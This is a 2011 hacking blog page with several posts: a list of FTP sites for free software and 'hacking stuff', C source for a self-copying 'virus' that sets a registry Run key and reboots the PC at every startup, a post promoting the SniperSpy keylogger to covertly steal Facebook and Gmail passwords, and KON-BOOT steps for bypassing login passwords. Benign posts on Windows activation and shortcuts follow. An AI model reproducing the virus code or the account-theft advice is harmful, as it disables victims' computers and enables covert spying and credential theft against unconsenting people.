Download Free Softwares, Games, Movies and lot of Hacking Stuff from 50+ FTP Sites

Internet definitely has several unheard places also known as underground websites, few of these website offer users 100s and 1000s of software, games, movies and lot of Hacking Stuff for downloads. Though these sites are pretty tough to find, I was able to unearth more than 50+ FTP sites that allow users to download software, games, movies and  lot of Hacking tools for free.
Here is a list of 50+ FTP sites that will allow you download content for free. Don’t forget to share and bookmark this page so that everyone can take advantage of it.
1. ftp://ftp.freenet.de/pub/filepilot/
2. ftp://193.43.36.131/Radio/MP3/
3. ftp://195.216.160.175/
4. ftp://207.71.8.54:21/games/
5. ftp://194.44.214.3/pub/music/
6. ftp://202.118.66.15/pub/books
7. ftp://129.241.210.42/pub/games/
8. ftp://clubmusic:clubmusic@217.172.16.3:8778/
9. ftp://212.174.160.21/games
10. ftp://ftp.uar.net/pub/e-books/
11. ftp://129.241.210.42/pub/games/
12. ftp://193.231.238.4/pub/
13. ftp://207.71.8.54/games/
14. ftp://194.187.207.98/video/
15. ftp://194.187.207.98/music/
16. ftp://194.187.207.98/soft/
17. ftp://194.187.207.98/games/
18. ftp://ftp.uglan.ck.ua/
19. ftp://159.153.197.74/pub
20. ftp://leech:l33ch@61.145.123.141:5632/
21. ftp://psy:psy@ftp.cybersky.ru
22. ftp://130.89.175.1/pub/games/
23. ftp://194.44.214.3/pub/
24. ftp://195.116.114.144:21/
25. ftp://64.17.191.56:21/
26. ftp://80.255.128.148:21/pub/
27. ftp://83.149.236.35:21/packages/
28. ftp://129.241.56.118/
29. ftp://81.198.60.10:21/
30. ftp://128.10.252.10/pub/
31. ftp://129.241.210.42/pub/
32. ftp://137.189.4.14/pub
33. ftp://139.174.2.36/pub/
34. ftp://147.178.1.101/
35. ftp://156.17.62.99/
36. ftp://159.153.197.74/pub/
37. ftp://193.140.54.18/pub/
38. ftp://192.67.63.35/
39. ftp://166.70.161.34/
40. ftp://195.161.112.15/musik/
41. ftp://195.161.112.15/
42. ftp://195.131.10.164/software
43. ftp://195.146.65.20/pub/win/
44. ftp://199.166.210.164/
45. ftp://195.46.96.194/pub/
46. ftp://61.136.76.236/
47. ftp://61.154.14.248/
48. ftp://62.210.158.81/
49. ftp://62.232.57.61/
50. ftp://212.122.1.85/pub/software/
51. ftp://193.125.152.110/pub/.1/misc/sounds/mp3/murray/

(Some of these links may not work in Mozilla Firefox. Please open them in Internet Explorer)

Enjoy...


A Virus in C to Restart the Computer at Every Startup

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.
For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.
Here is the source code.

 #include"stdio.h"
#include"dos.h"
#include"dir.h"
int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;
case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;
case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}



Other related posts:
A simple virus in C
Enjoy...
Category: 1 comments

Hack Facebook , Gmail or Yahoo passwords

Wondering to know how to hack Facebook password? Well before you try to hack any Facebook password, it is necessary to understand the real ways of hacking that actually work and also those that are simply scam and don’t work. Everyday I get a lot of emails where people ask me “how to hack Facebook password?” So in this post I have taken up this topic to show you the possible ways to do that!
Today even a noob computer user (perhaps like you) can easily hack Facebook or any other social networking site with ease in a matter of hours and thus hacking is no longer the secret art of a Russian hacker! Well the idea behind this post is to expose the truth behind hacking Facebook account so that you can stay away from all those scam sites which will rip off your pockets by making false promises to obtain any password for you. Also this post is not meant to encourage people into hacking Facebook, but rather it is meant to educate the Internet users to be aware of the common scams and frauds and stay away from them.
With my experience of over 7 years in the field of ethical hacking and security, all I can tell you is that there are only two ways to successfully hack a Facebook account.

1. Keylogging – Easiest Way to Hack Facebook Password

Keylogging refers to simply recording each and every keystroke that is  typed on a specific computer’s keyboard. This is possible with the use of a small computer program called keylogger (also known as spy software). Once installed, this program will  automatically load from the start-up, runs in invisible mode and start capturing each and every keystroke that was typed on the computer.  Some keyloggers with advanced features can also capture screenshots and monitor every activity on the computer. To install and use a kelooger one doesn’t need to have any special knowledge. That means anyone with a basic knowledge of computer can install and use this software with ease. Hence for a novice computer user this method is the easiest way to hack Facebook password. I recommend the following keylogger as the best for gaining access to facebook password.

 SniperSpy is a revolutionary product that will allow you to easily access *ANY* online accountor password protected material such as MySpace, Facebook, Yahoo, Gmail etc. There are absolutely *NO* limitations to what accounts or websites this software can access!

Download links for SniperSpy :
SniperSpy for Windows
SniperSpy for Mac

Why SniperSpy is the best?
Today there exists hundreds of keyloggers on the market but most of them are no more than a crap. However there are only a few that stand out of the crowd and SniperSpy is the best among them. I personally like SniperSpy for it’s REMOTE INSTALLATION FEATURE. With this you can install it on a remote computer without the need for having physical access to it. It operates in complete stealth mode so that it remains undetected.
Here is a summary of benefits that you will receive with Sniperspy software:
1. Access ANY Password
With SniperSpy you can hack any password and gain access to Facebook or any other online account.
2. Monitor Every Activity
You can monitor every activity of the target computer, take screenshots and record chats & IM conversations.
3. Never Get Caught
SniperSpy operates in total stealth mode and thus remains undetectable. Thus you need not have the fear of being traced or get caught.
4. Remote Installation Feature
With Remote Install feature, it is possible to install it even on computers for which you do not have physical access. However it can also be installed on a local computer.
5. Extremely Easy to Use
Installing and using SniperSpy is simple and needs no extra skill to manage.
6. Completely Safe to Use
This software is 100% safe to use since it doesn’t collect any information from your computer. SniperSpy is a reputed, trustworthy and reliable company which offers 100% privacy for it’s users.
7. Works on both Windows and Mac
Fully compatible with Windows 2000/XP/Vista/7 and Mac.
So what are you waiting for? If you are really serious to hack Facebook password then SniperSpy is for you. Go grab it now and expose the truth!

2. Other Ways to Hack Facebook Password

The other common way to hack passwords or online accounts is Phishing. This is the most widely used technique by many hackers to gain access to Facebook and other social networking sites. This method will make use of a fake login page (often called as spoofeed webpage) which exactly resemble the original one. Say for example a spoofed webpage of Facebook looks exactly same as that of the original page. This page is actually created by the hacker and is hosted on his own server. Once an innocent victim enters his/her password in such a fake login page, the login details are stolen away by the hacker. Most Internet users would easily fall prey to online phishing scams. Thus phishing scams trick users so that they themselves give away their passwords. However phishing requires specialized knowledge and high level skills to implement. Thus it would not be possible for a noob user to attempt this trick. It is punishable offense too. So I would recommend the use of keyloggers to hack Facebook since it is the easiest and safest way.

Other related posts :
Windows 7 password hack

Category: 3 comments

How Windows Product Activation (WPA) Works?

Windows Product Activation or WPA is a license validation procedure introduced by Microsoft Corporation in all versions of it’s Windows operating system. WPA was first introduced in Windows XP and continues to exist in Windows Server 2003, Windows Vista, Windows Server 2008 and Windows 7 as well. WPA enforces each end user to activate their copy of Windows so as to prevent unauthorized usage beyond the specific period of time until it is verified as genuine by Microsoft. How WPA really works was a closely guarded secret until GmbH analyzed WPA using a copy of Windows XP RC1 and published a paper on their findings.
In this post you will find answers to some of the most frequently asked questions about Windows Product Activation.

Why activation?

Microsoft’s intention behind the activation is to limit the usage of it’s Windows operating system to only one machine for which the retail license is issued. Any other computer which runs on the same license must be disallowed from using the software. Thus WPA demands for activation of the product within 30 days of it’s installation so as to ensure that it is genuine.

What does “Genuine Windows” means?

The copy of Windows is said to be genuine only if the product key used during the installation is genuine. It means that a given product key (retail license) must be used to install Windows only on one computer for which the license was purchased. Thus if the same key is used for the installation on another computer, then it is said to be a pirated copy.

Exactly what information is transmitted during the activation?

When you activate your copy of Windows you are transmitting an Installation ID code to the Microsoft either by phone or Internet depending on the method you choose to activate. Based on this, the Microsoft’s licensing system can determine whether or not the installed OS is genuine. If it is said to be genuine, then the system will receive the Activation ID which completes the activation process. If the activation is done via telephone then the Activation ID needs to be entered manually to complete the activation process.

What information does the Installation ID contain?

This Installation ID is a 50-digit number which is derived from the following two data.
1. Product ID – It is actually derived from the 25-digit product key (the alphanumeric value that is printed on the sticker over the Windows CD/DVD case) that is entered during the installation of the operating system. The Product ID is used to uniquely identify your copy of Windows.
2. Hardware ID – This value is derived based on the hardware configuration of your computer.
The WPA system checks the following 10 categories of the computer hardware to derive the Hardware ID:
  • Display Adapter
  • SCSI Adapter
  • IDE Adapter (effectively the motherboard)
  • Network Adapter (NIC) and its MAC Address
  • RAM Amount Range (i.e., 0-64mb, 64-128mb, etc.)
  • Processor Type
  • Processor Serial Number
  • Hard Drive Device
  • Hard Drive Volume Serial Number (VSN)
  • CD-ROM / CD-RW / DVD-ROM
Thus the Installation ID which is a combination of Product ID and Hardware ID is finally derived and sent to Microsoft during the activation process.

How is the Installation ID validated?

The Installation ID needs to be validated to confirm the authenticity of the installed copy of Windows. So after the Installation ID is received by Microsoft, it is decoded back so as to obtain the actual product key and the hardware details of the computer involved in the activation process.
The Microsoft’s system will now look to see if this is the first time the product key is being used for the activation. This happens when the user is trying to activate his Windows for the first time after purchase. If this is the case then the Installation ID is validated and the corresponding Activation ID is issued which completes the activation process.
However Microsoft system will now associate this product key with the hardware ID of the computer and stores this information on their servers. In simple words, during the first use of the product key, it is paired together with the Hardware ID and this information is stored up on the Microsoft servers.

What if a computer running a pirated copy of Windows attempts to activate?

 The activation fails whenever the copy of Windows installed is not said to be genuine. This usually happens when the product key used for the installation is said to have been used earlier on a different computer. This is determined during the activation process as follows:
During the validation of the Installation ID, the Microsoft’s system checks to see if the same product key was used in any of the previous activation processes. If yes then it looks to see the Hardware ID associated with it. The computer running a pirated copy of Windows will obviously have a different hardware configuration and hence the Hardware ID will mismatch. In this case the activation process will fail.
Thus for a successful activation, either of the following two cases must be satisfied:
  1. The product key must have been used for the first time. ie: The product key should not have been used for earlier activations on any other computer.
  2. If the product key is said to have been used earlier, then the Hardware ID should match. This happens only if the same computer for which the license was genuinely purchased is attempting for subsequent activation.

What about formatting the hard disk?

Each time the hard disk is reformatted and Windows is re-installed, it needs to be re-activated. However the activation process will be completed smoothly since the same computer is attempting for subsequent activation. In this case both the product key and the Hardware ID will match and hence the activation becomes successful.

What is I upgrade or make changes to my hardware?

In the above mentioned 10 categories of hardware, at least 7 should be the same. Thus you are allowed to make changes to not more than 3 categories of hardware. If you make too many changes then your activation will fail. In this case, it is necessary to contact the customer service representative via phone and explain about your problem. If he is convinced he may re-issue a new product key for your computer using which you can re-activate your Windows.

Some things WPA does not do

  • WPA does not send any personal information at all about you to Microsoft. There is still an option to register the product with Microsoft, but that is separate and entirely voluntary.
  • If you prefer to activate via phone, you are not required to give any personal information to Microsoft.
  • WPA does not provide a means for Microsoft to turn off your machine or damage your data/hardware. (Nor do they even have access to your data). This is a common myth that many people have about Microsoft products.
  • WPA is not a “lease” system requiring more payments after two years or any other period. You may use the product as licensed in perpetuity.
Other related posts :
Windows 7 password hack
Windows 7 hack : god mode
Windows tips and tricks

      Category: 0 comments

      Windows 7 Hack : GOD mode

      Have you ever wondered what else lies under the hood of the new Windows 7 you just got!
      There's a simple hack that will grant access to all of those options in one easy-to-set-up shortcut.
      The aptly named GodMode is a built-in, yet unadvertised feature in Windows 7 that gathers all Windows utilities in one spot. To access it, simply create a new folder and name it:
      GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
      And that's it! Open it up and you'll find access to display options, backup/recovery, power management and more. This is a useful trick for those of you that easily forget where to access the defragmenter or the device managager. You may even find a useful utility you didn't know existed.

      [Important note: Readers have noted that this tip also works on the 32-bit version of Windows Vista. If you are running the 64-bit version of Windows Vista, do not use this hack. It can cause Windows Explorer to crash.]

      Other related posts :
      Windows 7 password hack
      Windows 7 keyboard shortcuts

      Enjoy...

      Category: 0 comments

      Windows 7 password hack!


      Computer PasswordImagine the security nightmare if general users are able to bypass your operating system security and logon as Administrator or root account having all privileges by simply inserting an floppy or CD, now this scary situation is possible using a prototype software KON-BOOT which hacks into Windows and linux kernel on the fly while booting, the novice friendly softwares allows users to bypass logon passwords completely by simply booting via the KON-BOOT CD, in its current incarnation the software has been tested to bypass logon passwords on Windows 7,Windows Vista
      , Windows XP, Windows Server 2003/2008, Gentoo, Ubuntu, Debian and Fedora.


      Just follow the simple steps ahead to create KON-BOOT bootable CD or Floppy and bypass logon passwords easily.
      1. Download the KON-BOOT bootable CD image, If your anti-virus software complaints disable it for a while.
      2. Burn the disk images to suitable media and configure BIOS to boot from the media
      Other Related posts:
      Enjoy...
      Category: 0 comments

      Windows 7 keyboard shortcuts

      A variety of new keyboard shortcuts have been introduced in windows 7.

      Global keyboard shortcuts:

          * Windows key + Space bar operates as a keyboard shortcut for Aero Peek.
          * Windows key + D to show the desktop
          * Windows key + Up maximizes the current window.
          * Windows key + Down if current window is maximized, restores it; otherwise minimizes current window.
          * Windows key + Shift + Up maximizes the current window, in the vertical direction only.
          * Windows key + Left snaps the current window to the left edge of the screen.
          * Windows key + Right snaps the current window to the right half of the screen.
          * Windows key + Shift + Left and Windows key + Shift + Right move the current window to the left or right display.
          * Windows key + + (plus sign) functions as zoom in command wherever applicable.
          * Windows key + - (minus sign) functions as zoom out command wherever applicable.
          * Windows key + ESC (Escape key) turn off zoom once enabled.
          * Windows key + Home operates as a keyboard shortcut for Aero Shake.
          * Windows key + P shows an "external display options" selector that gives the user the choice of showing the desktop on only the computer's screen, only the external display, with the same output on both (clone), or on both displays with independent desktops (extend).

      Taskbar:

          * Shift + Click, or Middle click starts a new instance of the application, regardless of whether it's already running.
          * Ctrl + Shift + Click starts a new instance with Administrator privileges; by default, a User Account Control prompt will be displayed.
          * Shift + Right-click shows the classic Window menu (Restore / Minimize / Move / etc.); right-clicking on the application's thumbnail image will also show this menu. If the icon being clicked on is a grouped icon, the classic menu with Restore All / Minimize All / Close All menu is shown.
          * Ctrl + Click on a grouped icon cycles between the windows (or tabs) in the group

      Enjoy!!!

      Category: 0 comments

      Copyright ©

      Creative Commons License
      http://www.mayanksmansion.tk is licensed under a Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License

      Protected by Copyscape Online Plagiarism Test

      Copyright © 2011 Mayank Sharma. Powered by Blogger.